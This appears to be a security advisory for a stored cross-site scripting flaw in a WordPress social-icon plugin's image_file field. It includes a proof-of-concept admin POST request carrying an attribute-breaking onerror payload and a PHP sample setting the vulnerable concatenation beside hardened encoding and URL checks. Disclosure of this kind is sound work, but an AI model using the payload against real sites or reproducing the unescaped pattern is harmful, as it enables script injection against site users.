The plugin does not properly escape the image_file field when adding a new social icon, which allows high-privileged users to inject arbitrary JavaScript even when the unfiltered_html capability is disallowed. Version 3.2.0 addressed some of the issues, but the plugin was still vulnerable when clicking to edit the contaminated icon.
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd
Accept-Encoding: gzip, deflate
Cookie: [Admin cookies]
Connection: close

------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wpnonce"

482d64ba75
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=cnss_social_icon_add
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="title"

55
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="image_file"

." onerror=alert``;//
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="url"

1123
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="sortorder"

4
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="target"

1
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="action"

update
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="submit_button"

변경사항 저장
------WebKitFormBoundaryntci4RWsTIt6kFWd--
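The escaping gap described above, shown beside a hardened form as an added example (not the plugin's own code). It is plain PHP without WordPress; the `<img>` and `<input>` markup and every function name are assumptions, and in plugin code `esc_attr()` or `esc_url()` would take the place of the `attr()` helper.

```php
<?php
// Added example; markup and function names are hypothetical, not the plugin's.

// Constructed sample: the image_file value from the request above, as stored.
$stored = '." onerror=alert``;//';

// Vulnerable pattern: the stored value is concatenated into an attribute,
// so a double quote in the value ends the attribute and starts a new one.
function render_icon_vulnerable(string $image_file): string {
    return '<img src="' . $image_file . '">';
}

// Output-side fix: encode for the HTML attribute context.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Front-end/list view sink.
function render_icon_hardened(string $image_file, string $title): string {
    return '<img src="' . attr($image_file) . '" alt="' . attr($title) . '">';
}

// Edit-screen sink: a separate template that prints the same stored value,
// so it needs the same encoding even when the list view is already fixed.
function render_edit_form_hardened(string $image_file): string {
    return '<input type="text" name="image_file" value="' . attr($image_file) . '">'
         . '<img class="preview" src="' . attr($image_file) . '">';
}

// Input-side check (defence in depth): accept only absolute http(s) URLs.
function is_acceptable_image_url(string $value): bool {
    if (filter_var($value, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

echo render_icon_vulnerable($stored), PHP_EOL;
echo render_icon_hardened($stored, '55'), PHP_EOL;
echo render_edit_form_hardened($stored), PHP_EOL;
var_dump(is_acceptable_image_url($stored));
var_dump(is_acceptable_image_url('https://example.com/icons/sample.png'));
```

Encoding belongs at each place the value is printed; validating on save alone leaves rows that were stored before the fix still renderable as markup.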
qerogram
qerogram
Yes
2022-03-21 (about 4 months ago)
2022-03-21 (about 4 months ago)
2022-04-11 (about 4 months ago)